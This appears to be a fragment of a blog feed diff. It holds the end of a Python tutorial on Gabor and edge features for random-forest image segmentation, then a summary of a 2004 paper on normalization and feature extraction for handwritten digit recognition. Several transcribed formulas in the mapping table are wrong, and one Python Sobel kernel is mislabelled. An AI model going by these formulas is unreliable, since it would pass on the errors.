    if input_img.ndim == 3 and input_img.shape[-1] == 3:
        img = cv2.cvtColor(input_img, cv2.COLOR_BGR2GRAY)
    elif input_img.ndim == 2:
        img = input_img
    else:
        raise Exception("The module works only with grayscale and RGB images!")

    ################################################################
    # START ADDING DATA TO THE DATAFRAME

    # Add pixel values to the data frame
    pixel_values = img.reshape(-1)
    df['Pixel_Value'] = pixel_values  # Pixel value itself as a feature
    df['Image_Name'] = image  # Capture image name as we read multiple images

    ############################################################################
    # Generate Gabor features
    num = 1  # To count numbers up in order to give Gabor features a label in the data frame
    kernels = []
    for theta in range(2):  # Define number of thetas
        theta = theta / 4. * np.pi
        for sigma in (1, 3):  # Sigma with 1 and 3
            for lamda in np.arange(0, np.pi, np.pi / 4):  # Range of wavelengths
                for gamma in (0.05, 0.5):  # Gamma values of 0.05 and 0.5
                    gabor_label = 'Gabor' + str(num)  # Label Gabor columns as Gabor1, Gabor2, etc.
                    ksize = 9
                    kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
                    kernels.append(kernel)
                    # Now filter the image and add values to a new column
                    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
                    filtered_img = fimg.reshape(-1)
                    df[gabor_label] = filtered_img  # Labels columns as Gabor1, Gabor2, etc.
                    print(gabor_label, ': theta=', theta, ': sigma=', sigma, ': lamda=', lamda, ': gamma=', gamma)
                    num += 1  # Increment for gabor column label
    ########################################
    # Generate OTHER FEATURES and add them to the data frame

    # CANNY EDGE
    edges = cv2.Canny(img, 100, 200)  # Image, min and max values
    edges1 = edges.reshape(-1)
    df['Canny Edge'] = edges1  # Add column to original dataframe

    from skimage.filters import roberts, sobel, scharr, prewitt

    # ROBERTS EDGE
    edge_roberts = roberts(img)
    edge_roberts1 = edge_roberts.reshape(-1)
    df['Roberts'] = edge_roberts1

    # SOBEL
    edge_sobel = sobel(img)
    edge_sobel1 = edge_sobel.reshape(-1)
    df['Sobel'] = edge_sobel1

    # SCHARR
    edge_scharr = scharr(img)
    edge_scharr1 = edge_scharr.reshape(-1)
    df['Scharr'] = edge_scharr1

    # PREWITT
    edge_prewitt = prewitt(img)
    edge_prewitt1 = edge_prewitt.reshape(-1)
    df['Prewitt'] = edge_prewitt1

    # GAUSSIAN with sigma=3
    from scipy import ndimage as nd
    gaussian_img = nd.gaussian_filter(img, sigma=3)
    gaussian_img1 = gaussian_img.reshape(-1)
    df['Gaussian s3'] = gaussian_img1

    # GAUSSIAN with sigma=7
    gaussian_img2 = nd.gaussian_filter(img, sigma=7)
    gaussian_img3 = gaussian_img2.reshape(-1)
    df['Gaussian s7'] = gaussian_img3

    # MEDIAN with size=3
    median_img = nd.median_filter(img, size=3)
    median_img1 = median_img.reshape(-1)
    df['Median s3'] = median_img1

    # VARIANCE with size=3
    variance_img = nd.generic_filter(img, np.var, size=3)
    variance_img1 = variance_img.reshape(-1)
    df['Variance s3'] = variance_img1  # Add column to original dataframe

    ######################################
    # Update dataframe for images to include details for each image in the loop
    # (DataFrame.append was removed in pandas 2.0; use pd.concat instead)
    image_dataset = pd.concat([image_dataset, df])
    • STEP 2: READ LABELED IMAGES (MASKS) AND CREATE ANOTHER DATAFRAME WITH LABEL VALUES AND LABEL FILE NAMES
mask_dataset = pd.DataFrame()  # Create dataframe to capture mask info.

mask_path = "images/train_masks/"
for mask in os.listdir(mask_path):  # iterate through each file to perform some action
    print(mask)

    df2 = pd.DataFrame()  # Temporary dataframe to capture info for each mask in the loop
    input_mask = cv2.imread(mask_path + mask)

    # Check if the input mask is RGB or grey and convert to grey if RGB
    if input_mask.ndim == 3 and input_mask.shape[-1] == 3:
        label = cv2.cvtColor(input_mask, cv2.COLOR_BGR2GRAY)
    elif input_mask.ndim == 2:
        label = input_mask
    else:
        raise Exception("The module works only with grayscale and RGB images!")

    # Add pixel values to the data frame
    label_values = label.reshape(-1)
    df2['Label_Value'] = label_values
    df2['Mask_Name'] = mask

    mask_dataset = pd.concat([mask_dataset, df2])  # Update mask dataframe with info from each mask
    • STEP 3: GET DATA READY FOR RANDOM FOREST (or other classifier) COMBINE BOTH DATAFRAMES INTO A SINGLE DATASET
    dataset = pd.concat([image_dataset, mask_dataset], axis=1)  # Concatenate both image and mask datasets

    # If you expect image and mask names to be the same this is where we can perform sanity check
    # dataset['Image_Name'].equals(dataset['Mask_Name'])
    # If we do not want to include pixels with value 0
    # e.g. Sometimes unlabeled pixels may be given a value 0.
    dataset = dataset[dataset.Label_Value != 0]

    # Assign training features to X and labels to Y
    # Drop columns that are not relevant for training (non-features)
    X = dataset.drop(labels = ["Image_Name", "Mask_Name", "Label_Value"], axis=1)

    # Assign label values to Y (our prediction)
    Y = dataset["Label_Value"].values

    # Split data into train and test to verify accuracy after fitting the model.
    from sklearn.model_selection import train_test_split
    X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=20)
    • STEP 4: Define the classifier and fit a model with our training data
    # Import training classifier
    from sklearn.ensemble import RandomForestClassifier
    # Instantiate model with n number of decision trees
    model = RandomForestClassifier(n_estimators = 50, random_state = 42)

    # Train the model on training data
    model.fit(X_train, y_train)
    • STEP 5: Accuracy check
    from sklearn import metrics

    prediction_test = model.predict(X_test)
    # Check accuracy on test dataset.
    print("Accuracy = ", metrics.accuracy_score(y_test, prediction_test))
    • STEP 6: SAVE MODEL FOR FUTURE USE
# You can store the model for future use. In fact, this is how you do machine learning:
    # Train on training images, validate on test images and deploy the model on unknown images.
    # Save the trained model as pickle string to disk for future use
    model_name = "sandstone_model"
    pickle.dump(model, open(model_name, 'wb'))
    ]]>
    @@ -8847,7 +8847,7 @@ /posts/Paper-Handwritten%20digit%20recognition-investigation%20of%20normalization%20and%20feature%20extraction%20techniques/ - 前言

Handwritten digit recognition — a study of normalization and feature extraction techniques

Paper

Title

Paper-Handwritten digit recognition-investigation of normalization and feature extraction techniques

Authors

Cheng-Lin Liu, Kazuki Nakashima, Hiroshi Sako, Hiromichi Fujisawa

Journal

Pattern Recognition

Publication date

2004-02

Volume / pages

37 (2004) 265–279

    Abstract

In developing a character recognition system, the evaluation of various performances is crucial for selecting the correct options.

In earlier work we proposed aspect ratio adaptive normalization (ARAN) and evaluated the performance of state-of-the-art **feature extraction and classification techniques**.

This time we propose some **improved normalization functions and direction feature extraction strategies** and compare their performance with the existing techniques.

On three distinct data sources we compare:

• 10 normalization functions
  • 7 based on dimensions
  • 3 based on moments
• 8 feature vectors

Combining the normalization functions and feature vectors produces eighty classification accuracies for each dataset.

The comparison of normalization functions shows that the dimension-based ones outperform the moment-based ones, and that the **aspect ratio mapping** is influential.

The comparison of feature vectors shows that the **improved feature extraction strategies** outperform their **baseline counterparts**.

The **gradient feature** computed on the **gray-scale image** performs best, and the improved **NCFE (normalization-cooperated feature extraction)** features also perform well.

The combination of **normalization**, **feature extraction**, and **classification** yields very high accuracies on well-known datasets.

    1 Introduction

• **Optical character recognition (OCR)**
• A character recognizer involves the following tasks:
  • pre-processing
    • normalizing the size and aspect ratio of the image
    • interpolation techniques for pixel values
  • feature extraction
  • classification
    • parametric and nonparametric statistical classifiers
    • neural networks
    • support vector machines (SVMs)
    • hybrid classifiers

For pre-processing, we have shown that normalization of the character image has a significant effect on recognition performance, and we proposed the aspect ratio adaptive normalization (ARAN) strategy to improve it.


For feature extraction, the focus is on the diversity of implementation of ARAN and on direction feature extraction.

The performance of ARAN depends on the aspect ratio mapping function.

The direction feature is the most widely used feature in character recognition. Its performance depends largely on the representation of the feature and on the extraction technique.

The feature vector represents the directional distribution of chaincodes or gradients.

The new feature vectors aim to improve the performance of NCFE (normalization-cooperated feature extraction).


**Normalization** is considered the most important pre-processing factor in character recognition.

Usually the character image is **linearly mapped** onto a standard plane by **interpolation/extrapolation**.

With linear mapping, the character shape is not deformed except for the change of aspect ratio.

• **Perspective transformation** attempts to correct the imbalance of character width.

• **Moment normalization** attempts to correct rotation or slant.

• **Nonlinear normalization** is used to equalize the line density.

• **Slant normalization** can be estimated from context instead of moments.


**Feature extraction** is the core of character recognition.

• The **distribution of local stroke direction** (the direction feature) is widely used for its high performance and ease of implementation.

• The **local stroke direction** can be measured from the:

  • skeleton

    Definition: for a given character image, finding its skeleton lines is called thinning.

    Purpose: the skeleton is the one-pixel-wide center line of the strokes. It loses the stroke-width information but preserves the structural information of the character, which helps extract stroke features and is the basis of structural features.

  • chaincode
  • gradient

• The chaincode feature is widely adopted.

• The gradient feature applies to both gray-scale and binary images.

• To enhance the discriminating power of direction features, several **complementary features** have been proposed, e.g.:

  • structural and concavity features
  • profile shape features
  • curvature features

On the other hand, the so-called **normalization-cooperated feature extraction (NCFE)** method extracts direction features from the original image rather than from the normalized image.


We previously evaluated several statistical and neural classifiers for handwritten character recognition and found that some achieve high accuracy at low complexity.

SVMs have an advantage in classification accuracy but their computational cost is very high.

To test the performance of the normalization and feature extraction techniques, we use three classifiers of high accuracy:

• polynomial classifier
• discriminative learning quadratic discriminant function (DLQDF)
• support vector classifier with RBF kernel (SVC-rbf)

• 8 feature vectors
  • basic feature types
    • chaincode feature
    • profile shape feature
    • NCFE feature
    • gradient feature
  • two improved versions of NCFE:
    • enhanced NCFE with profile shape feature
    • continuous NCFE

• 3 databases
  • CENPARMI
  • NIST
  • Hitachi

The combinations of the 10 normalization functions and the 8 feature vectors give 80 classification accuracies.

In addition, each feature vector has two variants according to the direction resolution — 4 directions and 8 directions — which are evaluated separately.


Structure of the paper:

• Section 2 describes the normalization strategies;
• Section 3 describes the feature extraction techniques;
• Section 4 presents the experimental results;
• Section 5 concludes.

    2 Normalization techniques

2.1 Implementation of normalization

To facilitate feature extraction and classification, the $x/y$ dimensions (size) of the normalized image plane (the standard plane) are fixed.

However, in aspect ratio adaptive normalization (ARAN), the dimensions of the standard plane are not necessarily filled.

Depending on the aspect ratio, the normalized image is centered in the plane with one dimension filled.
Assume the standard plane is a square with side length $L$. Denote the width and height of the normalized character image by $W_2$ and $H_2$; the aspect ratio is defined as

$$R_2=\begin{cases} W_2/H_2, & \text{if } W_2<H_2,\\ H_2/W_2, & \text{otherwise.} \end{cases}$$

If the normalized image fills one dimension, then $\max(W_2, H_2) = L$. However, in moment normalization, where the centroid of the character image is aligned to the center of the standard plane, the normalized image does not necessarily fill one dimension and may exceed the standard plane. In that case $W_2$ and $H_2$ are not determined by $L$, and the part of the image outside the standard plane is truncated.


In the implementation of ARAN, the normalized character image fills a flexible plane of size $W_2 \times H_2$, which is then shifted to overlap the standard plane by aligning either the boundary or the centroid.
In the following we show how a character image of size $W_1 \times H_1$ is transformed into a normalized image of size $W_2 \times H_2$. The transformation can be done by forward mapping or by backward mapping.
Denoting the original and normalized images by $f(x, y)$ and $g(x', y')$ respectively, the normalized image is generated by $g(x', y') = f(x, y)$ based on coordinate mapping.
Forward mapping and backward mapping are given by $x'=x'(x,y),\ y'=y'(x,y)$ and $x=x(x',y'),\ y=y(x',y')$, respectively.

We describe the coordinate mapping of the various normalization methods and then address the interpolation of pixels.

    • 线性归一化(linear normalization)
    • 矩归一化(moment normalization)
    • 斜归一化(slant normalization)
    • 非线性归一化(nonlinear normalization)

    的正向映射(forward mapping)和反向映射见表1。

    Coordinate mapping of various normalization methods
    各种归一化方法的坐标映射
    MethodForward mappingBackward mapping
    Linear$x’=\alpha x$
    $y’=\beta y$
    $x=x’/\alpha$
    $y=y’/\beta$
    Moment$x’=\alpha (x-x_c)+x’_c$
    $y’=\beta (y-y_c)+y’_c$
    $x=(x’-x’_c)/\beta+x_c$
    $y=(y’-y’_c)/\beta+y_c$
    Slant$x’=x-(y-y_c)\tan\theta$
    $y’=y$
    $x=x’-(y+y_c)\tan\theta$
    $y=y’$
    Nonlinear$x’=W_2h_x(x)$
    $y’=H_2h_y(y)$
    $x=h_x{-1}(x’/W_2)$<br/>$y=h_y{-1}(y’/H_2)$
    • where $\alpha$ and $\beta$ denote the scaling ratios:

      • $\alpha=W_2/W_1$

      • $\beta=H_2/H_1$

    • Moment normalization here refers to a linear transformation without rotation; the center and size of the normalized image are determined by moments.

    • In moment-based slant normalization, the slant angle is computed from second-order moments:

      • $\tan\theta=\frac{\mu_{11}}{\mu_{02}}$
      • where $\mu_{pq}=\sum_x\sum_y(x-x_c)^p(y-y_c)^qf(x,y)$ (the central moments)
    • For nonlinear normalization, $h_x$ and $h_y$ denote the normalized accumulated line density histograms.

    • In forward mapping, $x$ and $y$ are discrete, but $x'(x,y)$ and $y'(x,y)$ are not necessarily discrete.

    • In backward mapping, $x'$ and $y'$ are discrete, but $x(x',y')$ and $y(x',y')$ are not necessarily discrete.

    • In forward mapping, the mapped coordinates $(x',y')$ do not necessarily cover all pixels of the normalized plane. Hence, implementing normalization requires either coordinate discretization or pixel interpolation.


    All (original) character images have binary gray levels.

    We use coordinate discretization to generate binary normalized images,

    and pixel interpolation to generate gray-scale normalized images.

    • In discretization, the mapped coordinates $(x',y')$ or $(x,y)$ are approximated by the nearest integers $([x'],[y'])$ or $([x],[y])$.
    • In the discretization of backward mapping, the discrete coordinates $(x',y')$ scan the pixels of the normalized plane, and the gray level $f([x],[y])$ is assigned to $g(x',y')$.
    • In the discretization of forward mapping, the discrete coordinates $(x,y)$ scan the pixels of the original image, and the gray level $f(x,y)$ is assigned to the pixels from $([x'(x)],[y'(y)])$ to $([x'(x+1)],[y'(y+1)])$.

    In the interpolation of backward mapping for generating gray-scale images:

    • the mapped position $(x,y)$ is surrounded by four discrete pixels;
      • the gray level $g(x',y')$ is a weighted combination of the four pixel values.

    In the interpolation of forward mapping for generating gray-scale images, each pixel of the original and normalized images is viewed as a square of unit area.
    By coordinate mapping, a unit square of the original image is mapped to a rectangle in the normalized plane.

    jpg

    As shown in the figure, each unit square in the normalized plane that overlaps the rectangle is assigned a gray level proportional to the overlapped area.
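
    As a concrete illustration, here is a minimal sketch of linear normalization by backward mapping with bilinear interpolation; the weighting of the four surrounding pixels is the standard bilinear scheme, not necessarily the paper's exact implementation:

    import numpy as np

    def backward_linear(f, W2, H2):
        # Linear normalization by backward mapping: x = x'/alpha, y = y'/beta.
        # Each normalized pixel takes a weighted combination of the four
        # original pixels surrounding the mapped position (x, y).
        H1, W1 = f.shape
        alpha, beta = W2 / W1, H2 / H1
        g = np.zeros((H2, W2))
        for yp in range(H2):
            for xp in range(W2):
                x, y = xp / alpha, yp / beta
                x0, y0 = int(x), int(y)
                x1, y1 = min(x0 + 1, W1 - 1), min(y0 + 1, H1 - 1)
                u, v = x - x0, y - y0
                g[yp, xp] = ((1 - u) * (1 - v) * f[y0, x0] + u * (1 - v) * f[y0, x1]
                             + (1 - u) * v * f[y1, x0] + u * v * f[y1, x1])
        return g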

    2.2 Aspect ratio mapping

    To implement the normalization, the width $W_2$ and height $H_2$ of the normalized image must be determined. We assume that $\max(W_2,H_2)$ equals the side length $L$ of the standard plane, while $\min(W_2,H_2)$ is determined by the aspect ratio $R_2$ defined above, so that the aspect ratio of the normalized image adapts to that of the original image. The aspect ratio mapping function therefore determines the size and shape of the normalized image.

    • In dimension-based normalization, the width and height of the actual image are taken as the dimensions.

    • In moment-based normalization,

      • the centroid of the original image is taken as the center point;
      • the boundaries are reset to $[x_c-2\sqrt{\mu_{20}},x_c+2\sqrt{\mu_{20}}]$ and $[y_c-2\sqrt{\mu_{02}},y_c+2\sqrt{\mu_{02}}]$;
      • the dimensions are reset to $W_1=4\sqrt{\mu_{20}}$ and $H_1=4\sqrt{\mu_{02}}$,
        • where $\mu_{pq}=\sum_x\sum_y(x-x_c)^p(y-y_c)^qf(x,y)$.

      Moment normalization of an image is a pre-processing method. Compared with direct linear normalization, its advantage is that it exploits the moment information of the image: while normalizing the original image to the canvas size, it aligns the centroid of the original image with the center of the canvas, and removes the margins of the original image as much as possible. (图像矩归一化_夜半罟霖的博客-CSDN博客_图像矩阵归一化)

      The image plane is expanded or trimmed to fit within this range.

      • The aspect ratio of the original image is computed as $R_1=\left\{\begin{matrix}
        W_1/H_1, & \mathrm{if}\ W_1<H_1\\
        H_1/W_1, & \mathrm{otherwise.}
        \end{matrix}\right.$
    • Varying the normalization strategy and the aspect ratio mapping function gives the $10$ normalization functions listed below (a sketch of the moment-based $F7$ follows the reproduction code further down).

    | No. | Description | Formula |
    | --- | --- | --- |
    | $F0$ | fixed aspect ratio (stretched) | $R_2=1$ |
    | $F1$ | aspect ratio preserved | $R_2=R_1$ |
    | $F2$ | square root of aspect ratio | $R_2=\sqrt{R_1}$ |
    | $F3$ | cubic root of aspect ratio | $R_2=\sqrt[3]{R_1}$ |
    | $F4$ | piecewise linear aspect ratio | $R_2=\left\{\begin{matrix} 0.25+1.5R_1, & \mathrm{if}\ R_1<0.5\\ 1, & \mathrm{otherwise.}\end{matrix}\right.$ |
    | $F5$ | square root of sine of aspect ratio | $R_2=\sqrt{\sin\left(\frac{\pi}{2}R_1\right)}$ |
    | $F6$ | nonlinear normalization with the aspect ratio mapping of $F5$; the line density histograms are computed as in the cited method | |
    | $F7$ | moment normalization with aspect ratio preserved | $R_2=R_1$ |
    | $F8$ | moment normalization with square root of aspect ratio | $R_2=\sqrt{R_1}$ |
    | $F9$ | moment normalization with cubic root of aspect ratio | $R_2=\sqrt[3]{R_1}$ |

    $F0$–$F5$ are plotted in the figure below; $F4$ and $F5$ are superior to $F0$.

    jpg

    All the normalization functions are implemented by forward mapping. Fig. 3 shows the images produced by each normalization function for the same original image.

    jpg

    Fig. 4 shows, for the same original image, the corresponding binary and gray-scale normalized images.

    jpg

    The standard (normalized) plane is $35\times 35$. When the aspect ratio of the normalized image deviates considerably from the original aspect ratio, the deformation of the character shape is also considerable (e.g., $F0$ and $F5$).

    For moment-based normalization ($F7$, $F8$ and $F9$), the normalized image is centered at the center point, and neither dimension of the standard plane is necessarily filled.

    Attempting to reproduce $F0$–$F5$ in Python:

    import cv2
    import numpy as np
    import matplotlib.pyplot as plt

    img = cv2.imread('9.png', 0)
    img.shape
    (76, 35)
    H2 = 35
    W2 = 35


    def R1(img):
        # Aspect ratio of the original image (always <= 1)
        if img.shape[0] < img.shape[1]:
            return img.shape[0] / img.shape[1]
        else:
            return img.shape[1] / img.shape[0]


    def pad_to_plane(ans):
        # Center the flexible plane inside the W2 x H2 standard plane
        pad_v = H2 - ans.shape[0]
        pad_h = W2 - ans.shape[1]
        return cv2.copyMakeBorder(ans, pad_v // 2, pad_v - pad_v // 2,
                                  pad_h // 2, pad_h - pad_h // 2,
                                  cv2.BORDER_CONSTANT, value=(255, 255, 255))


    def resize_with_ratio(img, r2):
        # cv2.resize takes dsize as (width, height); the longer side fills the plane
        if img.shape[0] < img.shape[1]:
            ans = cv2.resize(img, (W2, round(H2 * r2)))
        else:
            ans = cv2.resize(img, (round(W2 * r2), H2))
        return pad_to_plane(ans)


    def F0(img):
        return cv2.resize(img, (W2, H2))            # R2 = 1


    def F1(img):
        return resize_with_ratio(img, R1(img))      # R2 = R1


    def F2(img):
        return resize_with_ratio(img, R1(img) ** 0.5)


    def F3(img):
        return resize_with_ratio(img, R1(img) ** (1 / 3))


    def F4(img):
        if R1(img) >= 0.5:
            return F0(img)                          # R2 = 1
        return resize_with_ratio(img, 0.25 + 1.5 * R1(img))


    def F5(img):
        return resize_with_ratio(img, np.sin(R1(img) * np.pi / 2) ** 0.5)
    fig = plt.figure(figsize=(9, 3))

    ax = fig.add_subplot(1, 6, 1)
    plt.xticks([])
    plt.yticks([])
    ax.imshow(img, cmap='gray')
    ax.title.set_text('Original')
    for i, F in enumerate([F0, F1, F2, F3, F4, F5]):
        p = i + 2 if i < 5 else i + 3    # position in the 2 x 6 grid
        axi = fig.add_subplot(2, 6, p)
        plt.xticks([])
        plt.yticks([])
        axi.imshow(F(img), cmap='gray')
        axi.title.set_text('F' + str(i))
    plt.show()

    png
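
    The moment-based functions $F7$–$F9$ are not covered by the reproduction above. Below is a hypothetical sketch of $F7$ (moment normalization with preserved aspect ratio), reusing `img`, `W2`, `H2` and `np` from the code above; dividing the moments by the total mass is my assumption, made so that $\sqrt{\mu_{20}}$ and $\sqrt{\mu_{02}}$ behave as standard deviations:

    def F7(img):
        f = 255.0 - img                       # strokes (dark pixels) carry the weight
        ys, xs = np.mgrid[0:img.shape[0], 0:img.shape[1]]
        m = f.sum()
        xc, yc = (xs * f).sum() / m, (ys * f).sum() / m
        # Central moments divided by the total mass (assumed normalization)
        mu20 = ((xs - xc) ** 2 * f).sum() / m
        mu02 = ((ys - yc) ** 2 * f).sum() / m
        W1, H1 = 4 * np.sqrt(mu20), 4 * np.sqrt(mu02)
        # Preserved aspect ratio (R2 = R1): one uniform scale for both axes
        s = min(W2 / W1, H2 / H1)
        out = np.full((H2, W2), 255, dtype=np.uint8)
        for yp in range(H2):                  # backward mapping, centroid-centered
            for xp in range(W2):
                x = int(round((xp - W2 / 2) / s + xc))
                y = int(round((yp - H2 / 2) / s + yc))
                if 0 <= x < img.shape[1] and 0 <= y < img.shape[0]:
                    out[yp, xp] = img[y, x]
        return out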

    3 Feature extraction techniques

    • We extract three types of direction features (chaincode, gradient, and NCFE features).

    • Depending on whether slant normalization is applied, the chaincode feature has two variants.

    • For chaincode and gradient feature extraction, the normalized image is decomposed into $4$ or $8$ direction planes.

    • In NCFE, the edge pixels of the original image are mapped directly onto the $4$- or $8$-direction planes.

    • For feature measuring, each feature plane is either partitioned into uniform zones, with the intensity of each zone accumulated into one measurement, or convolved with blurring masks to give the measurements.

    • Convolution with blurring masks is equivalent to low-pass filtering followed by sampling. Usually, a Gaussian mask is used: $h(x,y)=\frac{1}{2\pi \sigma_x^2}\exp\left(-\frac{x^2+y^2}{2\sigma_x^2}\right)$

      • where $\sigma_x$ is related to the spacing of the blurring masks, which can be viewed as the sampling interval, the reciprocal of the sampling frequency.

        Empirical formula: $\sigma_x=\frac{\sqrt{2}\,t_x}{\pi}$

        • where $t_x$ is the interval between blurring masks along the $x$ axis (and likewise $t_y$ along the $y$ axis).
      • A blurring mask centered at $(x_0,y_0)$ gives one measurement by convolution: $F(x_0,y_0)=\sum_x\sum_yf(x,y)h(x-x_0,y-y_0)$

    Reproducing the Gaussian mask in Python:

    img_f = cv2.GaussianBlur(img, (7, 7), -1)

    fig = plt.figure(figsize=(4, 4))
    ax = fig.add_subplot(1, 2, 1)
    plt.xticks([])
    plt.yticks([])
    ax.imshow(img, cmap='gray')
    ax.title.set_text('Original')

    ax_f = fig.add_subplot(1, 2, 2)
    plt.xticks([])
    plt.yticks([])
    ax_f.imshow(img_f, cmap='gray')
    ax_f.title.set_text('GaussianBlur')

    plt.show()

    png

    • In chaincode feature extraction, the contour pixels of the normalized image are assigned to $8$ direction codes:

      jpg

      and the contour pixels of each direction are assigned to the corresponding direction plane. The assignment of chaincodes can be accomplished in a raster scan of the image, without contour tracing. In this process, a pixel with multiple connections can be assigned multiple chaincodes. To extract $4$-direction features, each pair of opposite-direction planes is merged into one feature plane, and the $4$ planes are blurred.


    • For NCFE, each chaincode in the original image is viewed as a line segment, which is mapped to another line segment in a direction plane of the standard plane.

    • In the direction plane, each grid cell crossed by the segment along its principal direction ($x$ or $y$) is given one unit of direction contribution.

    • Since the coverage of grid cells by a line segment is not discrete, an improved NCFE method based on continuous feature planes is proposed here (see the sketch after this list).

    • In the continuous plane, each pixel is viewed as a square, and the direction strength is proportional to the length of the segment falling into that square.

    jpg

    • As shown in Fig. 6, a line segment mapped from a chaincode covers the four cells A, B, C, and D.
      • With discrete NCFE, $A$ and $C$ are each assigned one unit of direction contribution.
      • With continuous NCFE, all $4$ cells are assigned direction strengths proportional to the segment length inside each cell.
    • Note that for NCFE, smoothing the character image is sometimes necessary so that the chaincodes better reflect the stroke directions.
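
    A minimal sketch of the continuous assignment: it distributes the length of a chaincode segment over the unit cells it crosses by dense sampling (the sampling-based approximation is a simplification of mine, not the paper's exact geometry):

    import numpy as np

    def segment_cell_lengths(p0, p1, shape, samples=1000):
        # Accumulate, for each unit cell of the plane, the length of the
        # segment p0 -> p1 that falls inside it (approximated by sampling)
        (x0, y0), (x1, y1) = p0, p1
        plane = np.zeros(shape)
        t = np.linspace(0.0, 1.0, samples, endpoint=False)
        xs = x0 + t * (x1 - x0)
        ys = y0 + t * (y1 - y0)
        step = np.hypot(x1 - x0, y1 - y0) / samples
        for x, y in zip(xs, ys):
            plane[int(y), int(x)] += step
        return plane

    # A diagonal segment covering several cells of a small plane
    print(segment_cell_lengths((0.5, 0.2), (2.8, 1.7), (3, 4)))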

    In gradient feature extraction, the Sobel operator is used to compute the $x/y$ components of the gradient. The gradient image is decomposed into 4 or 8 direction planes. Other researchers have also used the Roberts and Kirsch operators.

    jpg

    The gradient $\mathbf{g}(x,y)=[g_x,g_y]^T$ at position $(x,y)$:

    • $g_x(x,y)=f(x+1,y-1)+2f(x+1,y)+f(x+1,y+1)-f(x-1,y-1)-2f(x-1,y)-f(x-1,y+1)$

    • $g_y(x,y)=f(x-1,y+1)+2f(x,y+1)+f(x+1,y+1)-f(x-1,y-1)-2f(x,y-1)-f(x+1,y-1)$

    Reproducing the Sobel masks in Python:

    kernel_x = np.array([[1, 2, 1], [0, 0, 0], [-1, -2, -1]])
    kernel_y = np.array([[-1, 0, 1], [-2, 0, 2], [-1, 0, 1]])
    img_x = cv2.filter2D(img, cv2.CV_8UC3, kernel_x)
    img_y = cv2.filter2D(img, cv2.CV_8UC3, kernel_y)

    fig = plt.figure(figsize=(4, 4))
    ax = fig.add_subplot(1, 2, 1)
    plt.xticks([])
    plt.yticks([])
    ax.imshow(img, cmap='gray')
    ax.title.set_text('Original')

    ax_x = fig.add_subplot(2, 2, 2)
    plt.xticks([])
    plt.yticks([])
    ax_x.imshow(img_x, cmap='gray')
    ax_x.title.set_text('x')

    ax_y = fig.add_subplot(2, 2, 4)
    plt.xticks([])
    plt.yticks([])
    ax_y.imshow(img_y, cmap='gray')
    ax_y.title.set_text('y')

    plt.show()

    png


    The gradient strength and direction can be obtained from the vector $[g_x,g_y]^T$. For character feature extraction, the gradient is computed at every pixel of the normalized image. The range of gradient directions is partitioned into a number of regions (say, $8$ or $16$), each corresponding to a direction plane. Each pixel is assigned to one direction region, and its gradient strength contributes to the intensity of the corresponding plane. In our experiments, however, we adopt another strategy: each gradient vector is decomposed into components along standard directions.

    This strategy was previously used for feature extraction in online character recognition. We decompose the gradient vector into eight chaincode directions. If a gradient direction lies between two standard directions, the vector is decomposed into two components along those two directions, as in Fig. 8 (a sketch of this decomposition follows the figure).

    jpg
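
    A minimal sketch of this decomposition for a single gradient vector, assuming standard directions every 45° and the usual parallelogram decomposition between the two neighbouring directions:

    import numpy as np

    def decompose_gradient(gx, gy, n_dirs=8):
        # Split one gradient vector into components along the two
        # neighbouring standard directions (parallelogram decomposition)
        angle = np.arctan2(gy, gx) % (2 * np.pi)
        strength = np.hypot(gx, gy)
        step = 2 * np.pi / n_dirs
        d1 = int(angle // step) % n_dirs       # lower neighbouring direction
        d2 = (d1 + 1) % n_dirs                 # upper neighbouring direction
        a = strength * np.sin((d1 + 1) * step - angle) / np.sin(step)
        b = strength * np.sin(angle - d1 * step) / np.sin(step)
        return {d1: a, d2: b}

    # A gradient lying between direction 0 (0 deg) and direction 1 (45 deg)
    print(decompose_gradient(1.0, 0.5))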

    The gradient feature can be extracted from either binary or gray-scale normalized images. From a binary character image, a gray-scale normalized image is generated by forward binary-to-gray pixel mapping. We also call a gray-scale image generated this way a pseudo gray-scale image. The gradient feature of pseudo gray-scale images improves on the gradient feature of binary images.


    To enhance the discrimination ability of direction features, we take structural features and profile shape features as complementary features. The structural feature is represented by horizontal crossing counts, and the shape feature by the distances between the outermost edges and the convex hull. The crossing count and distance sequences are also blurred with one-dimensional Gaussian masks to give the feature measurements. Since the normalized plane is set to $35 \times 35$ pixels, the sequences have length $35$. We extract $11$ blurred horizontal crossing counts and $22$ (left and right) profile shape measurements. These measurements are appended to the blurred chaincode feature to form an enhanced feature vector.


    The NCFE feature can also be enhanced with complementary features. The crossing counts and profile shape distances are computed by the NCFE approach and mapped onto the standard plane. They are then blurred to give $11 + 22$ measurements, which are appended to the NCFE direction feature. The enhanced NCFE feature, as well as the continuous NCFE feature, can be viewed as improvements over the existing NCFE method.


    In our experiments, we test eight direction or enhanced feature vectors, each with a 4-direction and an 8-direction variant.
    The feature vectors are listed below.

    | Feature vector | Description | $4$-direction | $8$-direction |
    | --- | --- | --- | --- |
    | blr | blurred chaincode feature; on each feature plane, $5\times5$ Gaussian masks are placed uniformly to compute $25$ measurements. | 100D | 200D |
    | des | deslant chaincode feature; the original image is deslanted and normalized before the chaincode feature is extracted. | 100D | 200D |
    | mul | enhanced chaincode feature with complementary features. | 133D | 233D |
    | ncf | discrete NCFE direction feature. | 100D | 200D |
    | ncf-p | discrete NCFE direction feature plus complementary features. | 133D | 233D |
    | ncf-c | continuous NCFE direction feature. | 100D | 200D |
    | grd | gradient feature from binary images. | 100D | 200D |
    | grd-g | gradient feature from pseudo gray-scale images. | 100D | 200D |
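
    As an illustration of the blr row above, here is a minimal sketch of extracting the $25$ measurements from one direction plane: Gaussian blurring followed by uniform sampling, using the empirical $\sigma_x$ formula from earlier in this section (the exact mask placement is an assumption):

    import numpy as np
    from scipy import ndimage as nd

    def blurred_measurements(plane, n=5):
        # Blur one 35 x 35 direction plane (low-pass filtering), then
        # sample it on a uniform n x n grid: n * n = 25 measurements
        L = plane.shape[0]
        t = L / n                              # sampling interval t_x
        sigma = np.sqrt(2) * t / np.pi         # empirical formula above
        blurred = nd.gaussian_filter(plane, sigma)
        idx = (np.arange(n) * t + t / 2).astype(int)
        return blurred[np.ix_(idx, idx)].ravel()

    plane = np.zeros((35, 35))
    plane[10:25, 17] = 1.0                     # a toy vertical-stroke plane
    print(blurred_measurements(plane).shape)   # (25,)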

